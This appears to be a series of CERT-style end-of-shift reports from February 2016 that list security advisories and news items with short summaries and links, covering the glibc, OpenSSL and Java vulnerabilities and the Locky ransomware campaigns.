Vulnerability Note VU#938151: Forwarding Loop Attacks in Content Delivery Networks may result in denial of service
Original Release date: 29 Feb 2016 | Last revised: 29 Feb 2016
Overview: Content Delivery Networks (CDNs) may in some scenarios be manipulated into a forwarding loop, which consumes server resources and causes a denial of service (DoS) on the network.
Description: CWE-400: Uncontrolled Resource Consumption (Resource Exhaustion). Content Delivery Networks (CDNs) are used to improve...
---------------------------------------------
http://www.kb.cert.org/vuls/id/938151
*** F5 Security Advisory: Multiple NTP vulnerabilities CVE-2015-8139 and CVE-2015-8140 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/00/sol00329831.html?…
*** Bugtraq: [security bulletin] HPSBUX03552 SSRT102983 rev.1 - HP-UX BIND running Named, Remote Denial of Service (DoS) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537659
*** DFN-CERT-2016-0355: phpMyAdmin: Multiple vulnerabilities allow, among other things, bypassing security measures ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0355/
*** Bugtraq: [SYSS-2016-009] Sophos UTM 525 Web Application Firewall - Cross-Site Scripting in ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537662
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in the GSKit component of Tivoli Network Manager IP Edition (CVE-2016-0201) ***
http://www.ibm.com/support/docview.wss?uid=swg21974785
---------------------------------------------
*** IBM Security Bulletin: Multiple Security Vulnerabilities in Apache Tomcat affect IBM RLKS Administration and Reporting Tool ***
http://www.ibm.com/support/docview.wss?uid=swg21976103
---------------------------------------------
*** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Access Manager for Web (CVE-2015-7547) ***
http://www.ibm.com/support/docview.wss?uid=swg21977374
---------------------------------------------
*** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Access Manager for Mobile (CVE-2015-7547) ***
http://www.ibm.com/support/docview.wss?uid=swg21977372
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java SDK affects IBM Tivoli Access Manager for e-business and IBM Security Access Manager for Web 7.0 software (CVE-2016-0603) ***
http://www.ibm.com/support/docview.wss?uid=swg21978024
---------------------------------------------
*** IBM Security Bulletin: Cross-Site scripting vulnerability in IBM Business Process Manager document list control (CVE-2016-0227) ***
http://www.ibm.com/support/docview.wss?uid=swg21978058
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in IBM Java SDK affects IBM OS Images for Red Hat Linux Systems, AIX, and Windows. (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21977880
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in IBM Java SDK affects IBM Image Construction and Composition Tool. (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21977647
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in IBM Java SDK affects IBM Workload Deployer. (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21977646
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM SmartCloud Entry (CVE-2016-0475 CVE-2016-0448 CVE-2015-7575 CVE-2016-0466) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023408
---------------------------------------------
*** Security Bulletin: Vulnerability in IBM Java SDK affects IBM System Networking Switch Center (CVE-2015-7575) ***
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5099203
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in IBM Java SDK affects IBM PureApplication System. (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21978026
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Access Manager for Mobile ***
http://www.ibm.com/support/docview.wss?uid=swg21976765
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Access Manager for Web and IBM Tivoli Access Manager for e-business ***
http://www.ibm.com/support/docview.wss?uid=swg21976678
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Software Architect, Software Architect for WebSphere Software & Rational Software Architect RealTime ***
http://www.ibm.com/support/docview.wss?uid=swg21976894
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in Apache ActiveMQ affects IBM Tivoli System Automation Application Manager (CVE-2015-5254) ***
http://www.ibm.com/support/docview.wss?uid=swg21977546
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 26-02-2016 18:00 − Monday 29-02-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Fixing the Internet's routing security is urgent and requires collaboration ***
---------------------------------------------
The Internet is fragile. Many of its protocols were designed at a time when the goal was rapid network expansion based on trust among operators. Today, the Internet's open nature is what makes it so great for business, education and communication, but the absence of security mechanisms at its core is something that criminals are eager to exploit. In late January, traffic to many IP (Internet Protocol) addresses of the U.S. Marine Corps was temporarily diverted through an ISP in Venezuela.
---------------------------------------------
http://www.cio.com/article/3038752/fixing-the-internets-routing-security-is…
*** Angler Exploit Kit Learns New Tricks, Finds Home On Popular Website ***
---------------------------------------------
Angler Exploit evaded detection through new technique that bypasses Firefox and Chrome security protection.
---------------------------------------------
http://threatpost.com/angler-exploit-kit-learns-new-tricks-finds-home-on-po…
*** HackingTeam Reborn; A Brief Analysis of an RCS Implant Installer ***
---------------------------------------------
As I'm generally quite occupied with my day job as Director of R&D at Synack, the weekend is when I finally have some free time to blog. This weekend I wasn't sure what I'd write about until @osxreverser tweeted late Friday afternoon:...
---------------------------------------------
https://objective-see.com/blog/blog_0x0D.html
*** The rise of polymorphic malware ***
---------------------------------------------
97% of malware is unique to a specific endpoint, rendering signature-based security virtually useless. The data collected by Webroot throughout 2015 shows that today's threats are truly global and highly dynamic. Many attacks are staged, delivered, and terminated within a matter of hours, or even minutes, having harvested user credentials and other sensitive information. Countering these threats requires an innovative approach to attack detection that leverages advanced techniques and...
---------------------------------------------
https://www.helpnetsecurity.com/2016/02/29/the-rise-of-polymorphic-malware/
*** ATMZombie: banking trojan in Israeli waters ***
---------------------------------------------
On November 2015, Kaspersky Lab researchers identified ATMZombie, a banking Trojan that is considered to be the first malware to ever steal money from Israeli banks. The incident Israeli banks experienced had a very fascinating and innovative method of stealing the money.
---------------------------------------------
http://securelist.com/blog/research/73866/atmzombie-banking-trojan-in-israe…
*** Increasing the resilience of Europe's telecommunication infrastructures through Incident Reporting ***
---------------------------------------------
A recent ENISA report analyses how mandatory incident reporting schemes have improved resilience and security in the EU telecoms sector. Experiences from this scheme can also serve as a model for the implementation of the forthcoming NIS Directive in other sectors.
---------------------------------------------
https://www.enisa.europa.eu/media/press-releases/increasing-the-resilience-…
*** Security: 85 percent of SSL VPNs have insecure configurations ***
---------------------------------------------
Numerous SSL VPNs secure their users' traffic only inadequately, a security company claims. Many providers reportedly still use SHA-1 or MD5. In addition, around 10 percent of the services are said to be vulnerable to Heartbleed.
---------------------------------------------
http://www.golem.de/news/security-85-prozent-der-ssl-vpns-haben-unsichere-k…
*** Click fraud: Trojan family repeatedly infiltrates Google Play ***
---------------------------------------------
Android users currently need to be wary of free apps that pose as popular games. Behind them hide click-fraud apps with which crooks cash in.
---------------------------------------------
http://heise.de/-3120091
*** Cyber-Attack Against Ukrainian Critical Infrastructure ***
---------------------------------------------
On December 23, 2015, Ukrainian power companies experienced unscheduled power outages impacting a large number of customers in Ukraine. This report provides an account of the events that took place based on interviews with company personnel.
---------------------------------------------
https://ics-cert.us-cert.gov/alerts/IR-ALERT-H-16-056-01
*** OpenSSL CVE-2016-0799: heap corruption via BIO_printf ***
---------------------------------------------
There are a couple of issues with OpenSSL's BIO_*printf() functions, defined in crypto/bio/b_print.c, that are set to be fixed in the forthcoming security release. The function that is primarily responsible for interpreting the format string and transforming this string and the function's arguments into a string is _dopr().
---------------------------------------------
https://guidovranken.wordpress.com/2016/02/27/openssl-cve-2016-0799-heap-co…
*** VU#419128: IKE/IKEv2 protocol implementations may allow network amplification attacks ***
---------------------------------------------
Vulnerability Note VU#419128: IKE/IKEv2 protocol implementations may allow network amplification attacks
Original Release date: 29 Feb 2016 | Last revised: 29 Feb 2016
Overview: Implementations of the IKEv2 protocol are vulnerable to network amplification attacks.
Description: CWE-406: Insufficient Control of Network Message Volume (Network Amplification). IKE/IKEv2 and other UDP-based protocols can be used to amplify denial-of-service attacks. In some scenarios, an amplification of up to 900%...
---------------------------------------------
http://www.kb.cert.org/vuls/id/419128
*** F5 Security Advisory: libpng out-of-bounds read vulnerability CVE-2015-7981 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/21/sol21057235.html?…
*** APPLE-SA-2016-02-25-1 Apple TV 7.2.1 ***
---------------------------------------------
APPLE-SA-2016-02-25-1 Apple TV 7.2.1
Apple TV 7.2.1 is now available and addresses the following:
bootp
Available for: Apple TV (3rd Generation)
Impact: A malicious Wi-Fi network may be able to determine networks a device has previously accessed
Description: Upon connecting to a Wi-Fi network, iOS may have broadcast MAC addresses of previously accessed networks via the DNAv4 protocol. This issue was addressed through disabling DNAv4 on unencrypted Wi-Fi networks.
CVE-ID
CVE-2015-3778 : Piers...
---------------------------------------------
http://prod.lists.apple.com/archives/security-announce/2016/Feb/msg00000.ht…
*** Access Governance Suite 6.0-6.4 ***
---------------------------------------------
Abstract: README for HTML Fragment Privilege Escalation Vulnerability E-Fix
E-Fix Deliverable: AGS-SV-eFix022416.zip
Document ID: 5236850
Security Alert: Yes
Distribution Type: Public
Entitlement Required: No
Files: AGS-SV-eFix022416.zip (3.83 kB), AGS-SV-eFix022416-CHECKSUM.txt (99 bytes)
Products: Access Governance 6.4, Access Governance 6.1, Access Governance 6.2, Access Governance 6.3
Superseded Patches: None
---------------------------------------------
https://download.novell.com/Download?buildid=Tft9udlb11s~
*** D-Link / Netgear FIRMADYNE Command Injection / Buffer Overflow ***
---------------------------------------------
Topic: D-Link / Netgear FIRMADYNE Command Injection / Buffer Overflow
Risk: High
Text: Hello, We’d like to report several vulnerabilities in embedded devices developed by D-Link and Netgear, which were discove...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016020224
*** Bugtraq: [security bulletin] HPSBGN03549 rev.1 - HP IceWall Products using glibc, Remote Denial of Service (DoS), Arbitrary Code Execution ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537637
*** Cisco Videoscape Distribution Suite for Internet Streaming TCP Session Handling Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Citrix Security Advisory for glibc Vulnerability CVE-2015-7547 ***
---------------------------------------------
A vulnerability has been recently disclosed in the glibc getaddrinfo() function. This issue could potentially allow an attacker to inject code into a process that calls the vulnerable function. The issue has been assigned the following CVE identifier:...
---------------------------------------------
https://support.citrix.com/article/CTX206991
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java Runtime affects IBM WebSphere MQ Internet Pass-Thru (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21977517
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java SDK affects Rational Functional Tester (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21976947
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM InfoSphere BigInsights (Applicable CVEs: CVE-2015-7575, CVE-2016-0448, CVE-2016-0466, CVE-2016-0475) ***
http://www.ibm.com/support/docview.wss?uid=swg21976080
---------------------------------------------
*** IBM Security Bulletin: IBM Maximo Asset Management is vulnerable to cross-site scripting, caused by improper validation of user-supplied input (CVE-2016-0262) ***
http://www.ibm.com/support/docview.wss?uid=swg21977828
---------------------------------------------
*** IBM Security Bulletin: Current releases of the IBM SDK, Java Technology Edition are affected by CVE-2016-0603 ***
http://www.ibm.com/support/docview.wss?uid=swg21977549
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Apache Cordova affects IBM MobileFirst Platform Foundation (CVE-2015-8320) ***
http://www.ibm.com/support/docview.wss?uid=swg2C1000091
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect WebSphere DataPower XC10 Appliance (CVE-2016-0475, CVE-2015-7575, CVE-2016-0448) ***
http://www.ibm.com/support/docview.wss?uid=swg21976366
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect WebSphere eXtreme Scale (CVE-2016-0475, CVE-2015-7575, CVE-2016-0448) ***
http://www.ibm.com/support/docview.wss?uid=swg21976442
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java Runtime Version 6 affects IBM Cognos Business Viewpoint (CVE-2015-7575 ) ***
http://www.ibm.com/support/docview.wss?uid=swg21977407
---------------------------------------------
*** IBM Security Bulletin: IBM Maximo Asset Management could allow an authenticated user to view work logs during purchase orders that they should not have access to (CVE-2016-0222) ***
http://www.ibm.com/support/docview.wss?uid=swg21976949
---------------------------------------------
*** Security Bulletin: Vulnerabilities in OpenSSL affect IBM BladeCenter Switches (CVE-2015-3194, CVE-2015-3195) ***
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5099199
---------------------------------------------
*** IBM Security Bulletin: Insecure Transmission Vulnerability with IBM InfoSphere Information Server (CVE-2015-7490) ***
http://www.ibm.com/support/docview.wss?uid=swg21975827
---------------------------------------------
*** IBM Security Bulletin: libpng related security vulnerabilities identified in IBM Expeditor (CVE-2015-7981, CVE-2015-8126, CVE-2015-8540, CVE-2015-8472) ***
http://www.ibm.com/support/docview.wss?uid=swg21975904
---------------------------------------------
*** IBM Security Bulletin: Sensitive data lingers in memory on the WebSphere DataPower XC10 Appliance ***
http://www.ibm.com/support/docview.wss?uid=swg21971658
---------------------------------------------
*** IBM Security Bulletin: Sensitive data lingers in memory on the WebSphere eXtreme Scale server ***
http://www.ibm.com/support/docview.wss?uid=swg21971657
---------------------------------------------
*** IBM Security Bulletin: IBM PowerVC is impacted by OpenStack Glance denial of service vulnerability (CVE-2015-5286) ***
http://www.ibm.com/support/docview.wss?uid=nas8N1021122
---------------------------------------------
*** IBM Security Bulletin: IBM PowerVC is impacted by OpenStack Glance security vulnerability (CVE-2015-5251) ***
http://www.ibm.com/support/docview.wss?uid=nas8N1021121
---------------------------------------------
*** IBM Security Bulletin: IBM PowerVC is impacted by OpenStack Nova denial of service vulnerability (CVE-2015-3280) ***
http://www.ibm.com/support/docview.wss?uid=nas8N1021120
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 25-02-2016 18:00 − Friday 26-02-2016 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** VU#444472: QNAP Signage Station and iArtist Lite contain multiple vulnerabilities ***
---------------------------------------------
CVE-2015-6022: An authenticated attacker without administrative permissions may upload a malicious file, such as a PHP script,
---------------------------------------------
http://www.kb.cert.org/vuls/id/444472
*** DSA-3492 gajim - security update ***
---------------------------------------------
Daniel Gultsch discovered a vulnerability in Gajim, an XMPP/Jabber client. Gajim didn't verify the origin of roster updates, allowing an attacker to spoof them and potentially allowing her to intercept messages.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3492
*** Open Web Analytics 1.5.7 Cross Site Scripting ***
---------------------------------------------
Open Web Analytics suffers from a Cross-Site Scripting vulnerability in the owa_site_id parameter because it fails to sanitize input before rendering the content to the user. The vulnerability can be triggered by hitting the ALT+SHIFT+X key after the payload is injected.
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016020217
*** Bugtraq: Zimbra Cross-Site Scripting vulnerabilities ***
---------------------------------------------
Recently Zimbra Collaboration 8.6 Patch 5 was released. It fixed two Cross-Site Scripting vulnerabilities discovered by Fortinet's FortiGuard Labs.
---------------------------------------------
http://www.securityfocus.com/archive/1/537627
*** Security update for older Apple TV devices ***
---------------------------------------------
On Thursday evening Apple updated the operating system of its older multimedia boxes. The update brings numerous security fixes.
---------------------------------------------
http://heise.de/-3118206
*** Quick Audit of *NIX Systems, (Fri, Feb 26th) ***
---------------------------------------------
If you think that only computers running Microsoft Windows are targeted by attackers, you're wrong! UNIX (used here as a generic term, not focusing on a specific distribution or brand) is a key operating system on the Internet. Many websites and other public services are relying on it (Netcraft is compiling interesting stats on this topic).
Therefore it is mandatory to keep an eye on your servers by using proactive and reactive controls.
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20771&rss
*** Apache Xerces-C Buffer Overflow Lets Remote Users Deny Service or Potentially Execute Arbitrary Code ***
---------------------------------------------
A vulnerability was reported in Apache Xerces-C. A remote user can execute arbitrary code on the target system.
A remote user can send specially crafted documents to trigger a buffer overflow in the XML parser library and cause the target application to crash or potentially execute arbitrary code on the target system.
---------------------------------------------
http://www.securitytracker.com/id/1035113
*** Crypto-Trojan Locky: batch files infect Windows, tool promises protection ***
---------------------------------------------
Batch files are the latest craze when it comes to smuggling the crypto-Trojan Locky past the virus scanner, and the plan works. In search of protective measures, we tried out a tool that is supposed to stop Locky and its kind.
---------------------------------------------
http://heise.de/-3118188
*** Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities ***
---------------------------------------------
Infor CRM suffers from multiple stored cross-site scripting
vulnerabilities. Input passed to several POST/PUT parameters in
JSON format is not properly sanitised before being returned to the
user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session in context of an affected site.
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016020219
*** Serialization Must Die: Act 2: XStream (Jenkins CVE-2016-0792) ***
---------------------------------------------
The following new pre-authentication exploit against Jenkins (CVE-2016-0792) works because Groovy is on the classpath. There are probably a million other apps that use XStream and have Groovy on the classpath. I put almost no effort into trying to find this vulnerable pattern in other open source applications -- this Jenkins CVE is just one of many.
---------------------------------------------
https://www.contrastsecurity.com/security-influencers/serialization-must-di…
*** IKE/IKEv2: Ripe for DDoS Abuse ***
---------------------------------------------
This is my latest research into preemptive DDoS trends. This time I looked into IKEv2 and what potential it has in regards to DDoS abuse use cases and amplification measurements. The short answer is, it could be easily weaponized for DDoS campaigns.
---------------------------------------------
https://www.reddit.com/r/netsec/comments/47l3zv/ikeikev2_ripe_for_ddos_abus…
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM Spectrum Control (formerly Tivoli Storage Productivity Center) CVE-2015-3193, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196, CVE-2015-1794 ***
http://www.ibm.com/support/docview.wss?uid=swg21977355
---------------------------------------------
*** IBM Security Bulletin: Multiple Vulnerabilities in IBM Java Runtime affect IBM Control Center (CVE-2015-4872, CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21977686
---------------------------------------------
*** IBM Security Bulletin: IBM PowerVC is impacted by OpenStack Glance information disclosure vulnerability (CVE-2015-5163) ***
http://www.ibm.com/support/docview.wss?uid=nas8N1021118
---------------------------------------------
*** Security Bulletin: Vulnerabilities in glibc affect IBM Integrated Management Module II (IMM2) for System x, BladeCenter and Flex Systems (CVE-2015-1472, CVE-2013-7423, CVE-2014-7817, CVE-2014-9402) ***
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5099198
---------------------------------------------
*** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM QRadar SIEM and Incident Forensics (CVE-2015-7547) ***
http://www.ibm.com/support/docview.wss?uid=swg21977665
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM SDK Java Technology Edition affects IBM Development Package for Apache Spark (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21977538
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java SDK affects IBM B2B Advanced Communications (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21976813
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java SDK affects IBM QRadar SIEM and Incident Forensics. (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21977664
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in IBM Java Runtime affect Watson Explorer, Watson Content Analytics, and OmniFind Enterprise Edition (CVE-2015-7575, CVE-2015-4872) ***
http://www.ibm.com/support/docview.wss?uid=swg21976276
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM Control Center (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21977575
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Initiate Master Data Service (CVE-2015-4872, CVE-2016-0466, CVE-2015-7575, CVE-2016-0448) ***
http://www.ibm.com/support/docview.wss?uid=swg21976545
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security AppScan Enterprise (CVE-2016-0466, CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21976553
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java Runtime affects Rational Policy Tester (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21976733
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java SDK affects IBM Spectrum Scale RAID/IBM GPFS Native RAID (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005673
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java SDK affects IBM Spectrum Scale RAID/IBM GPFS Native RAID (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023364
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect Tivoli Endpoint Manager for Remote Control. ***
http://www.ibm.com/support/docview.wss?uid=swg21976855
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Business Developer (CVE-2015-7575, CVE-2016-0466) ***
http://www.ibm.com/support/docview.wss?uid=swg21976768
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Developer for i, Rational Developer for AIX and Linux, Rational Developer for Power Systems Software ***
http://www.ibm.com/support/docview.wss?uid=swg21976840
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect WebSphere Cast Iron (CVE-2015-7575, CVE-2016-0448) ***
http://www.ibm.com/support/docview.wss?uid=swg21977301
---------------------------------------------
*** IBM Security Bulletin: A security vulnerability has been identified in IBM Business Process Manager and IBM HTTP Server shipped with IBM Cloud Orchestrator (CVE-2015-1932, CVE-2015-4938) ***
http://www.ibm.com/support/docview.wss?uid=swg2C1000043
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 24-02-2016 18:00 − Thursday 25-02-2016 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** New wave of malware: crypto-Trojan Locky disguises itself as a fax ***
---------------------------------------------
The dangerous ransomware Trojan has recently been distributed via e-mails claiming that the recipient has received a fax. Virus scanners still cannot do much with the current Locky version.
---------------------------------------------
http://heise.de/-3117249
*** Eavesdropping by the Foscam Security Camera ***
---------------------------------------------
Brian Krebs has a really weird story about the built-in eavesdropping by the Chinese-made Foscam security camera: Imagine buying an internet-enabled surveillance camera, network attached storage device, or home automation gizmo, only to find that it secretly and constantly phones home to a vast peer-to-peer (P2P) network run by the Chinese manufacturer of the hardware.
---------------------------------------------
https://www.schneier.com/blog/archives/2016/02/eavesdropping_b_1.html
*** Behind the Malware - Botnet Analysis ***
---------------------------------------------
While analyzing our website firewall logs we discovered an old vulnerability in the RevSlider plugin being retargeted. RevSlider, the plugin whose vulnerability led to massive website compromises in 2015, was being leveraged again in an attempt to infect websites over a year since its initial disclosure. The original hack required sending an AJAX request containing the action revslider_ajax_action to ...
---------------------------------------------
https://blog.sucuri.net/2016/02/behind-the-malware-botnet-analysis.html
*** Cisco FirePOWER Management Center Unauthenticated Information Disclosure Vulnerability ***
---------------------------------------------
A vulnerability in the Cisco FirePOWER Management Center could allow an unauthenticated, remote attacker to obtain information about the Cisco FirePOWER Management Center software version from the device login page.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Drupal Core - Critical - Multiple Vulnerabilities - SA-CORE-2016-001 ***
---------------------------------------------
Advisory ID: SA-CORE-2016-001
Project: Drupal core
Version: 6.x, 7.x, 8.x
Date: 2016-February-24
Security risk: 15/25 (Critical) AC:Basic/A:User/CI:Some/II:Some/E:Proof/TD:All
Vulnerability: Multiple vulnerabilities
---------------------------------------------
https://www.drupal.org/SA-CORE-2016-001
*** OpenSSL announces patches for security vulnerabilities ***
---------------------------------------------
Administrators on whose servers the popular crypto library for SSL/TLS connections is in use will have to patch once again on Tuesday.
---------------------------------------------
http://heise.de/-3117855
*** Critical Vulnerabilities in Palo Alto Networks PAN-OS , (Thu, Feb 25th) ***
---------------------------------------------
Yesterday, Palo Alto Networks released an update to PAN-OS, which addresses five different vulnerabilities [1]. The security researcher who identified the vulnerabilities will publish details about these issues at a conference on March 16th. You MUST patch affected systems before that date. Two of the vulnerabilities appear to be particularly dangerous, and affected devices should be patched immediately.
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20767&rss
*** Malicious websites exploit Silverlight bug that can pwn Macs and Windows ***
---------------------------------------------
Malicious websites are exploiting a recently fixed vulnerability in Microsoft's Silverlight application framework to perform drive-by malware attacks on vulnerable visitor devices, a security researcher has determined.
The critical code-execution vulnerability, which Microsoft patched last month, was actively exploited for two years in attack code owned by Italy-based exploit broker Hacking Team.
---------------------------------------------
http://arstechnica.com/security/2016/02/malicious-websites-exploit-silverli…
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 23-02-2016 18:00 − Wednesday 24-02-2016 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Numerous vendors patch dramatic glibc vulnerability ***
---------------------------------------------
Linux is almost everywhere, and glibc, which is vulnerable in older versions, is correspondingly widespread. Security updates are available from Zyxel, VMware and Citrix, among others; other vendors give the all-clear.
---------------------------------------------
http://heise.de/-3115787
*** OpenCms 9.5.2 Cross Site Scripting ***
---------------------------------------------
Topic: OpenCms 9.5.2 Cross Site Scripting
Risk: Low
Text: Advisory ID: SYSS-2015-063
Product: OpenCms
Official Maintainer: Alkacon Software GmbH
Affected Version(s): 9.5.2
Tested ...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016020206
*** libssh library: two vulnerabilities allow, among other things, bypassing security measures ***
---------------------------------------------
Two vulnerabilities in the libssh library allow a remote, unauthenticated attacker to carry out a denial-of-service (DoS) attack and to bypass security measures and, as a result, to spy out information.
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0326/
*** Squid: Multiple Denial of Service issues in HTTP Response processing. ***
---------------------------------------------
Due to incorrect bounds checking Squid is vulnerable to a denial of service attack when processing HTTP responses.
---------------------------------------------
http://www.squid-cache.org/Advisories/SQUID-2016_2.txt
*** Exploiting a Kernel Paged Pool Buffer Overflow in Avast Virtualization Driver ***
---------------------------------------------
Version(s): 11.1.2245; possibly earlier versions Description: A vulnerability was reported in avast!. A local user can gain system privileges on the target system. Avast Internet Security, Avast Pro Antivirus, Avast Premier, and Avast Free Antivirus are affected. Solution: The vendor has issued a fix (11.1.2253).
---------------------------------------------
http://www.securitytracker.com/id/1035093
*** Drupal 6 hits the end of the line ***
---------------------------------------------
If you have a Drupal 6 website then you won't be receiving any more official security advisories or patches; from today your site is vulnerable to any new security issues discovered in Drupal 6 core or its modules, forever.
---------------------------------------------
https://nakedsecurity.sophos.com/2016/02/24/drupal-6-hits-the-end-of-the-li…
*** Admins beware: crypto-Trojan infects hundreds of web servers ***
---------------------------------------------
This time the CTB-Locker ransomware Trojan is targeting not Windows users but web servers. It has already encrypted the files of hundreds of websites, and there is currently no end in sight.
---------------------------------------------
http://heise.de/-3116470
*** F5: sol13304944: NTP vulnerability CVE-2015-7974 ***
---------------------------------------------
NTP 4.x before 4.2.8p6 and 4.3.x before 4.3.90 do not verify peer associations of symmetric keys when authenticating packets, which might allow remote attackers to conduct impersonation attacks via an arbitrary trusted key, aka a "skeleton key." (CVE-2015-7974)
---------------------------------------------
https://support.f5.com/kb/en-us/solutions/public/k/13/sol13304944.html
*** Analysis of a Malicious .lnk File with an Embedded Payload, (Wed, Feb 24th) ***
---------------------------------------------
We received some feedback today from Nick, a SANS ISC reader who detected an interesting phishing campaign based on an ACE file. I also detected the same kind of file earlier this morning. ACE is an old compression algorithm developed by a German company called e-merge. This file format was popular around the year 2000. Today it has almost disappeared and has been replaced by more popular formats, but ACE files can still be handled by popular tools like WinRAR or WinZIP. The fact that the format is quite old
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20763&rss
*** Attackers Can Turn Microsoft's Exploit Defense Tool EMET Against Itself ***
---------------------------------------------
itwbennett writes: FireEye researchers have found a way for exploits to trigger a specific function in EMET that disables all protections it enforces for other applications. The researchers believe that their new technique, which essentially uses EMET against itself, is more reliable and easier to use than any previously published bypasses. It works against all supported versions of EMET - 5.0, 5.1 and 5.2 - but Microsoft patched the issue in EMET 5.5, which was released on Feb. 2.
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/rwo8Nq2dFiw/attackers-can-t…
*** Ransomware: Locky now also arrives via JScript ***
---------------------------------------------
A spam campaign is now also distributing the Locky ransomware via JScript attachments in e-mails, which allegedly come from a sausage manufacturer. (Trojan, virus)
---------------------------------------------
http://www.golem.de/news/ransomware-locky-kommt-jetzt-auch-ueber-javascript…
*** Mousejacking: What you need to know ***
---------------------------------------------
Got a wireless mouse or keyboard that uses a USB dongle? Seems that many of them can be fed fake clicks and keystrokes from a distance...
---------------------------------------------
https://nakedsecurity.sophos.com/2016/02/24/mousejacking-what-you-need-to-k…
*** Cisco ACE 4710 Application Control Engine Command Injection Vulnerability ***
---------------------------------------------
